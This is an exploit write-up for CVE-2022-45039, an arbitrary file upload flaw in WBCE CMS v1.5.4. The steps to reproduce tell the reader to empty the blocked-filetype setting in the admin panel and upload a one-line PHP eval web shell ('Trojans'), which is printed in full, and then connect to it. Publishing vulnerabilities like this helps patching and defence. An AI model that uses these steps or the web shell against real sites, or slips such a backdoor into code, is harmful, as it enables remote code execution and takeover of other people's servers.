Headline
CVE-2022-45039: WBCE CMS v1.5.4 getshell
An arbitrary file upload vulnerability in the Server Settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary code via a crafted PHP file.
Exploit Title: WBCE CMS v1.5.4 can implement getshell by modifying the upload file type
Date: 24/11/2022
Exploit Author: 10vexh
Contact: https://github.com/10vexh
Product: WBCE CMS (https://github.com/WBCE/WBCE_CMS)
Version: v1.5.4
Describe:The PHP file can be uploaded by modifying the file type prohibited from uploading in the background, resulting in the getshell.
**
Steps to reproduce:
**
Select show advance options in Settings
Set No upload for this filetypes to null
Select Upload File
Upload Trojans<? php @eval($_POST[‘test’]) ?>
Found that the storage path can be connected
Try to connect